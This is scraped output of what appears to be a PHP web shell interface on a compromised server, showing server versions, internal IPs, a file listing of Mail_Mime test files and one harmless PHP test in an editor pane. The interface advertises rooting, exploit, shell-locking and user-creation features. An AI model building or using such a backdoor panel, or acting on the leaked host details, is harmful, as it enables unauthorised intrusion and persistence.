Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
test /
Mail_Mime /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
class-filename.phpt
242
B
-rw-r--r--
encoding_case.phpt
244
B
-rw-r--r--
headers_with_mbstring.phpt
8.32
KB
-rw-r--r--
headers_without_mbstring.phpt
8.32
KB
-rw-r--r--
sleep_wakeup_EOL-bug3488-part1.phpt
545
B
-rw-r--r--
sleep_wakeup_EOL-bug3488-part2.phpt
586
B
-rw-r--r--
test_Bug_10596_1.phpt
296
B
-rw-r--r--
test_Bug_10816_1.phpt
570
B
-rw-r--r--
test_Bug_10999_1.phpt
491
B
-rw-r--r--
test_Bug_11381.phpt
557
B
-rw-r--r--
test_Bug_11731.phpt
684
B
-rw-r--r--
test_Bug_12165.phpt
381
B
-rw-r--r--
test_Bug_12385_1.phpt
539
B
-rw-r--r--
test_Bug_12411.phpt
649
B
-rw-r--r--
test_Bug_12466.phpt
445
B
-rw-r--r--
test_Bug_13032.phpt
539
B
-rw-r--r--
test_Bug_13444.phpt
670
B
-rw-r--r--
test_Bug_13962.phpt
367
B
-rw-r--r--
test_Bug_14529.phpt
521
B
-rw-r--r--
test_Bug_14779.phpt
489
B
-rw-r--r--
test_Bug_14780.phpt
351
B
-rw-r--r--
test_Bug_15320.phpt
462
B
-rw-r--r--
test_Bug_16539.phpt
7.34
KB
-rw-r--r--
test_Bug_17025.phpt
412
B
-rw-r--r--
test_Bug_17175.phpt
695
B
-rw-r--r--
test_Bug_18083.phpt
592
B
-rw-r--r--
test_Bug_18772.phpt
924
B
-rw-r--r--
test_Bug_19497.phpt
547
B
-rw-r--r--
test_Bug_20226.phpt
341
B
-rw-r--r--
test_Bug_20273.phpt
302
B
-rw-r--r--
test_Bug_20563.phpt
379
B
-rw-r--r--
test_Bug_20564.phpt
271
B
-rw-r--r--
test_Bug_3513_1.phpt
475
B
-rw-r--r--
test_Bug_3513_2.phpt
567
B
-rw-r--r--
test_Bug_3513_3.phpt
631
B
-rw-r--r--
test_Bug_7561_1.phpt
789
B
-rw-r--r--
test_Bug_8386_1.phpt
551
B
-rw-r--r--
test_Bug_8541_1.phpt
499
B
-rw-r--r--
test_Bug_9722_1.phpt
360
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sleep_wakeup_EOL-bug3488-part1.phpt
--TEST-- Bug #3488 Sleep/Wakeup EOL Consistency - Part 1 --SKIPIF-- --FILE-- <?php require_once('Mail/mime.php'); $mm = new Mail_mime("\n"); $mm->setHTMLBody('<html></html>'); $mm->setTxtBody('Blah blah'); if (version_compare(phpversion(), "5.0.0", '<')) { $mmCopy = $mm; } else { $mmCopy = clone($mm); } $mm->get(); $x = $mm->headers(); $smm = serialize(array('mm' => $mmCopy, 'header' => $x['Content-Type'])); $fp = fopen('sleep_wakeup_data', 'w'); fwrite($fp, $smm); fclose($fp); echo "Data written"; ?> --EXPECT-- Data written
Close